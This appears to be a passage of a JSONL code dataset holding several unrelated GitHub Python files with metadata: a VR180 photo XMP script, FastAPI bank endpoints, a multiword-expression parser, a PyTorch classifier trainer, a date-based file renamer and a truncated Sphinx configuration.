'http://ns.google.com/photos/1.0/panorama/'\nXMPMeta.register_namespace(XMP_GIMAGE, 'GImage')\nXMPMeta.register_namespace(XMP_GPANO, 'GPano')\n\n# Set GPano properties\nlxmp.set_property(XMP_GPANO, 'ProjectionType', 'equirectangular')\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaLeftPixels', image_width/2)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaTopPixels', 0)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageWidthPixels', image_width)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoWidthPixels', image_width*2)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'InitialViewHeadingDegrees', 180)\n\n# Encode right image to BASE64\nrimage_data = open(rimage_path, 'rt').read()\nrimage_base64 = base64.b64encode(rimage_data)\n\n# Set GImage properties\nlxmp.set_property(XMP_GIMAGE, 'Mime', 'image/jpeg')\nlxmp.set_property(XMP_GIMAGE, 'Data', rimage_base64)\n\n# Put XMP.\nif vrimage_file.can_put_xmp(lxmp):\n vrimage_file.put_xmp(lxmp)\n print(vrimage_file.get_xmp())\n print(\"Done!\")\n\nvrimage_file.close_file()\n", "repo_name": "temoki/make_vr180photo_py", "sub_path": "make_vr180photo.py", "file_name": "make_vr180photo.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 30, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 33, "usage_type": "call"}, {"api_name": "libxmp.XMPFiles", "line_number": 36, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 43, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 44, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 44, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "16776006048", "text": "from typing import List, Optional\n\nfrom fastapi import APIRouter, Depends, Query\nfrom fastapi.responses import JSONResponse\n\nfrom app.api.errors import BANK_NOT_FOUND\nfrom app.dependencies.services import get_bank_service\nfrom app.models.banks import Bank\nfrom app.models.currencies import Currency\nfrom app.services.banks import Banks\nfrom app.utils.exceptions import BankNotFound\nfrom loguru import logger\n\nrouter = APIRouter(tags=[\"banks\"], prefix=\"/banks\")\n\n\n@router.get(\n path=\"/all\",\n description=\"Метод получения списка всех банков\",\n response_model=List[Bank]\n)\nasync def get_banks(\n currency_id: Optional[int] = Query(default=None),\n banks_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_banks\")\n result = await banks_service.get_banks(currency_id)\n logger.info(\"Method get_banks return \" + result)\n logger.info(\"Finish method get_banks\")\n return result or JSONResponse({})\n\n\n@router.get(\n path=\"/{bank_id}\",\n description=\"Метод получения банка по id\",\n response_model=Bank\n)\nasync def get_bank_by_id(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_by_id\")\n result = await bank_service.get_bank_by_id(bank_id)\n if result:\n logger.info(\"Method get_bank_by_id return \" + result)\n else:\n logger.error(f\"Method get_bank_by_id except {BANK_NOT_FOUND}\")\n return result or JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n\n\n@router.get(\n path=\"/{bank_id}/currencies\",\n description=\"Метод дял получения валют банка\",\n response_model=List[Currency]\n)\nasync def get_bank_currencies(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_currencies\")\n try:\n result = await bank_service.get_bank_currencies(bank_id)\n logger.info(\"Method get_bank_currencies return \" + result)\n return result\n except BankNotFound:\n logger.error(f\"Method get_bank_currencies except {BANK_NOT_FOUND}\")\n return JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n", "repo_name": "Racers-Squad/Ficha-Backend", "sub_path": "app/api/routes/bank.py", "file_name": "bank.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Query", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 24, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 26, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 20, 
"usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 40, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 40, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 40, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 42, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 42, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 45, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 47, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 48, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 36, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 58, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 58, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 60, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 60, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "app.utils.exceptions.BankNotFound", "line_number": 65, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.currencies.Currency", "line_number": 54, "usage_type": "name"}]}
+{"seq_id": "72561785767", "text": "import itertools\nimport threading\nfrom abc import ABC, abstractmethod\nfrom functools import lru_cache\nfrom typing import List, Tuple, Dict, Optional\nfrom fnmatch import fnmatch\n\nimport tokenizations\n\nfrom i18n import Language\nfrom models import Mwe\n\n\nclass Parsed:\n def __init__(self, language: Language, text: str, tokens: List[str],\n token_positions: List[Tuple[int, int]],\n lemmas: List[str]):\n self.language = language\n self.text = text\n self.tokens = tokens\n self.token_positions = token_positions\n self.lemmas = lemmas\n\n def contains_mwe(self, mwe: Mwe) -> bool:\n return self.contains_mwe_with_lemmas(mwe.lemmas)\n\n def contains_mwe_with_lemmas(self, lemmas: List[str]) -> bool:\n all_lemmas_exist = True\n\n for lemma in lemmas:\n this_lemma_exists = False\n for possible_lemma in lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n if any([fnmatch(parsed_lemma, possible_lemma) for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n elif any([fnmatch(parsed_token, possible_lemma) for parsed_token in self.tokens]):\n this_lemma_exists = True\n else:\n if any([parsed_lemma == possible_lemma for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n all_lemmas_exist = all_lemmas_exist and this_lemma_exists\n\n return all_lemmas_exist\n\n def get_mwe_indices(self, mwe: Mwe) -> Tuple:\n if not self.contains_mwe(mwe):\n raise AssertionError(\"Mwe should be in parsed sentence.\")\n\n mwe_lemma_positions: Dict[str, List[int]] = dict()\n for ix_tm, mwe_lemma in enumerate(mwe.lemmas):\n mwe_lemma_positions[mwe_lemma] = []\n for possible_lemma in mwe_lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n for ix, lemma in enumerate(self.lemmas):\n if fnmatch(lemma, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n for ix, token in enumerate(self.tokens):\n if fnmatch(token, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n else:\n for ix, lemma in enumerate(self.lemmas):\n if lemma == possible_lemma:\n mwe_lemma_positions[mwe_lemma].append(ix)\n\n mwe_instances = list(itertools.product(*[x for x in mwe_lemma_positions.values()]))\n mwe_instances_sorted = sorted(mwe_instances, key=lambda x: max(x) - min(x))\n return mwe_instances_sorted[0]\n\n def get_mwe_tokens(self, mwe: Mwe) -> List[str]:\n mwe_indices = self.get_mwe_indices(mwe)\n return [self.tokens[x] for x in mwe_indices]\n\n\nclass Parser(ABC):\n def __init__(self):\n self.parser_lock = threading.Lock()\n self.language = None\n\n @abstractmethod\n def get_sentence_count(self, text: str):\n pass\n\n @abstractmethod\n def lemmatize(self, text: str, mwe: Optional[Mwe] = None) -> Tuple[List[str], List[str]]:\n pass\n\n @lru_cache(maxsize=None)\n def parse(self, text: str, mwe: Mwe = None) -> Parsed:\n with self.parser_lock:\n tokens, lemmas = self.lemmatize(text, mwe)\n # print(\"Language:\", self.language)\n # print(\"Tokens:\", tokens)\n # print(\"Lemmas:\", lemmas)\n token_positions = tokenizations.get_original_spans(tokens, text)\n return Parsed(self.language, text, tokens, token_positions, lemmas)\n", "repo_name": "Dodiom/dodiom", "sub_path": "src/nlp/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "i18n.Language", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": 
"typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 34, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Mwe", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 55, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 58, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 45, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 69, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 74, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 76, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 84, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 88, "usage_type": "name"}, {"api_name": "tokenizations.get_original_spans", "line_number": 94, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "40301737406", "text": "#!/usr/bin/env python3\n\"\"\"Train a classifier to classify images as backgroud or targets.\"\"\"\n\nimport argparse\nimport datetime\nimport pathlib\nfrom typing import Tuple\nimport tarfile\nimport shutil\nimport yaml\n\nimport torch\n\nfrom train import datasets\nfrom train.train_utils import utils, swa\nfrom core import classifier\nfrom data_generation import generate_config\n\n_LOG_INTERVAL = 50\n_SAVE_DIR = pathlib.Path(\"~/runs/uav-clf\").expanduser()\n\n\ndef train(model_cfg: dict, train_cfg: dict, save_dir: pathlib.Path = None) -> None:\n\n # TODO(alex) these paths should be in the generate config\n train_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_train\")\n eval_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_val\")\n\n use_cuda = torch.cuda.is_available()\n\n highest_score = {\"base\": 0, \"swa\": 0}\n\n clf_model = classifier.Classifier(\n backbone=model_cfg.get(\"backbone\", None),\n img_width=generate_config.PRECLF_SIZE[0],\n img_height=generate_config.PRECLF_SIZE[0],\n num_classes=2,\n )\n print(\"Model: \\n\", clf_model)\n\n if use_cuda:\n torch.backends.cudnn.benchmark = True\n clf_model.cuda()\n\n optimizer = create_optimizer(train_cfg[\"optimizer\"], clf_model)\n lr_params = train_cfg[\"lr_scheduler\"]\n\n epochs = train_cfg.get(\"epochs\", 0)\n assert epochs > 0, \"Please supply epoch > 0\"\n\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n float(lr_params.get(\"max_lr\", 1e-2)),\n total_steps=len(train_loader) * epochs,\n pct_start=float(lr_params.get(\"warmup_fraction\", 0.1)),\n div_factor=float(lr_params[\"max_lr\"]) / float(lr_params[\"start_lr\"]),\n final_div_factor=float(lr_params[\"start_lr\"]) / float(lr_params[\"end_lr\"]),\n )\n\n loss_fn = torch.nn.CrossEntropyLoss()\n global_step = 0\n\n for epoch in range(epochs):\n all_losses = []\n\n for idx, (data, labels) in enumerate(train_loader):\n optimizer.zero_grad()\n global_step += 1\n\n if use_cuda:\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n losses = loss_fn(out, labels)\n all_losses.append(losses.item())\n\n # Compute the gradient throughout the model graph\n losses.backward()\n optimizer.step()\n lr_scheduler.step()\n\n if idx % _LOG_INTERVAL == 0:\n lr = optimizer.param_groups[0][\"lr\"]\n print(\n f\"Epoch: {epoch} step {idx}, loss {sum(all_losses) / len(all_losses):.5}. lr: {lr:.4}\"\n )\n\n # Call evaluation function\n clf_model.eval()\n highest_score = eval_acc = eval(\n clf_model, eval_loader, use_cuda, highest_score, save_dir,\n )\n clf_model.train()\n\n print(\n f\"Epoch: {epoch}, Training loss {sum(all_losses) / len(all_losses):.5} \\n\"\n f\"Base accuracy: {eval_acc['base']:.4} \\n\"\n )\n\n\ndef eval(\n clf_model: torch.nn.Module,\n eval_loader: torch.utils.data.DataLoader,\n use_cuda: bool = False,\n previous_best: dict = None,\n save_dir: pathlib.Path = None,\n) -> float:\n \"\"\" Evalulate the model against the evaulation set. Save the best \n weights if specified. 
\"\"\"\n num_correct, total_num = 0, 0\n\n with torch.no_grad():\n for data, labels in eval_loader:\n\n if torch.cuda.is_available():\n data = data.cuda()\n labels = labels.cuda()\n\n out = clf_model(data)\n _, predicted = torch.max(out.data, 1)\n\n num_correct += (predicted == labels).sum().item()\n total_num += data.shape[0]\n\n accuracy = {\n \"base\": num_correct / total_num,\n }\n\n if accuracy[\"base\"] > previous_best[\"base\"]:\n print(f\"Saving model with accuracy {accuracy}.\")\n\n # Delete the previous best\n utils.save_model(clf_model, save_dir / \"classifier.pt\")\n\n return accuracy\n else:\n return previous_best\n\n\ndef create_data_loader(\n train_cfg: dict, data_dir: pathlib.Path,\n) -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader]:\n batch_size = train_cfg.get(\"batch_size\", 64)\n\n assert data_dir.is_dir(), data_dir\n\n dataset = datasets.ClfDataset(data_dir, img_ext=generate_config.IMAGE_EXT,)\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, pin_memory=True, shuffle=True\n )\n return loader\n\n\ndef create_optimizer(optim_cfg: dict, model: torch.nn.Module) -> torch.optim.Optimizer:\n \"\"\" Take in optimizer config and create the optimizer for training. \"\"\"\n name = optim_cfg.get(\"type\", None)\n if name.lower() == \"sgd\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=momentum,\n weight_decay=weight_decay,\n nesterov=True,\n )\n elif name.lower() == \"rmsprop\":\n lr = float(optim_cfg[\"lr\"])\n momentum = float(optim_cfg[\"momentum\"])\n weight_decay = float(optim_cfg[\"weight_decay\"])\n optimizer = torch.optim.RMSprop(\n model.parameters(), lr=lr, momentum=momentum, weight_decay=weight_decay\n )\n else:\n raise ValueError(f\"Improper optimizer supplied {name}.\")\n\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.random.manual_seed(42)\n\n if torch.cuda.is_available():\n torch.cuda.random.manual_seed(42)\n\n parser = argparse.ArgumentParser(\n description=\"Trainer code for classifcation models.\"\n )\n parser.add_argument(\n \"--model_config\",\n required=True,\n type=pathlib.Path,\n help=\"Path to yaml model definition.\",\n )\n args = parser.parse_args()\n\n config_path = args.model_config.expanduser()\n assert config_path.is_file(), f\"Can't find {config_path}.\"\n\n # Load the model config\n config = yaml.safe_load(config_path.read_text())\n\n model_cfg = config[\"model\"]\n train_cfg = config[\"training\"]\n\n # Copy in this config file to the save dir. 
The config file will be used to load the\n # saved model.\n save_dir = _SAVE_DIR / (\n datetime.datetime.now().isoformat().split(\".\")[0].replace(\":\", \".\")\n )\n save_dir.mkdir(parents=True)\n shutil.copy(config_path, save_dir / \"config.yaml\")\n\n train(model_cfg, train_cfg, save_dir)\n\n # Create tar archive if best weights are saved.\n with tarfile.open(save_dir / \"classifier.tar.gz\", mode=\"w:gz\") as tar:\n for model_file in save_dir.glob(\"*\"):\n tar.add(model_file, arcname=model_file.name)\n print(f\"Saved model to {save_dir / 'classifier.tar.gz'}\")\n", "repo_name": "alexwitt23/uav-austin", "sub_path": "train/train_clf.py", "file_name": "train_clf.py", "file_ext": "py", "file_size_in_byte": 6834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 26, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 26, "usage_type": "name"}, {"api_name": "data_generation.generate_config.DATA_DIR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "core.classifier.Classifier", "line_number": 33, "usage_type": "call"}, {"api_name": "core.classifier", "line_number": 33, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 35, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 35, "usage_type": "name"}, {"api_name": "data_generation.generate_config.PRECLF_SIZE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "data_generation.generate_config", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.backends", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.max", "line_number": 121, "usage_type": "call"}, {"api_name": "train.train_utils.utils.save_model", "line_number": 134, "usage_type": "call"}, {"api_name": "train.train_utils.utils", "line_number": 134, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "train.datasets.ClfDataset", "line_number": 148, "usage_type": "call"}, {"api_name": "train.datasets", "line_number": 148, "usage_type": "name"}, {"api_name": "data_generation.generate_config.IMAGE_EXT", "line_number": 148, "usage_type": "attribute"}, {"api_name": 
"data_generation.generate_config", "line_number": 148, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 149, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.utils", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.optim.RMSprop", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 173, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.random.manual_seed", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.random", "line_number": 183, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.cuda.random.manual_seed", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 194, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 203, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 211, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 211, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 214, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 219, "usage_type": "call"}]}
+{"seq_id": "21198317732", "text": "from datetime import datetime\nimport pandas as pd\nimport os\nfrom datetime import timedelta\n\nnome_list = []\n\ndir = input(\"Input directory: \")\n\nano_inicial = input(\"Input data inicial - timestep: \")\ndata_fmt = input(\"Input formato datetime: \")\nano_inicial_data = datetime.strptime(ano_inicial.strip(), data_fmt)\n\ndata_final_lista = pd.DataFrame(columns=[\"data\",\"dias\"])\n\nfor nome_arquivo in os.listdir(dir):\n #print(nome_arquivo.split(\".\")[0])\n \n dias=int(nome_arquivo.split(\".\")[0])\n \n data_final = ano_inicial_data + timedelta(days=dias*3)\n data_formatada = data_final.strftime(data_fmt)\n print(data_formatada)\n \n os.rename(dir + nome_arquivo, dir + data_formatada + \".nc\")\n \n data_final_lista = data_final_lista.append({\"data\":data_formatada,\"dias\":dias}, ignore_index=True)\n\ndata_final_lista.to_csv(\"lista_datas.csv\")", "repo_name": "IgorErhardt/Cod_Bank", "sub_path": "Filename_to_YMD.py", "file_name": "Filename_to_YMD.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 21, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "33513543923", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# -- General configuration -----------------------------------------------------\n\nimport datetime\nimport warnings\nimport sys\nimport os\n\nwarnings.simplefilter('ignore', DeprecationWarning)\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'repoze.sphinx.autointerface',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.intersphinx'\n]\n\nintersphinx_mapping = {\n #'zcomponent': ('http://docs.zope.org/zope.component', None),\n 'sqla': ('http://docs.sqlalchemy.org/en/latest', None),\n 'validictory': ('http://validictory.readthedocs.org/en/latest', None),\n 'who': ('http://docs.repoze.org/who/latest', None),\n 'python3': ('http://docs.python.org/3', None),\n 'tstring': ('http://docs.pylonsproject.org/projects/translationstring/en/latest', None),\n 'venusian': ('http://docs.pylonsproject.org/projects/venusian/en/latest', None),\n}\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'edapi'\nthisyear = datetime.datetime.now().year\ncopyright = '2013-%s, Amplify Insight ' % thisyear\n\n\nversion = '1.0'\n\nrelease = version\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\nexclude_patterns = ['_build']\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n\n# -- Options for HTML output ---------------------------------------------------\n\nsys.path.append(os.path.abspath('_themes'))\nhtml_theme_path = ['_themes']\nhtml_theme = 'pyramid'\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\nhtml_title = 'EdAPI RESTful Development Framework'\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. 
They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\nhtml_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_domain_indices = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\nhtml_show_sphinx = False\nhtml_show_copyright = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# This is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = None\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'edapidoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #'preamble': '',\n}\n\n# Grouping the 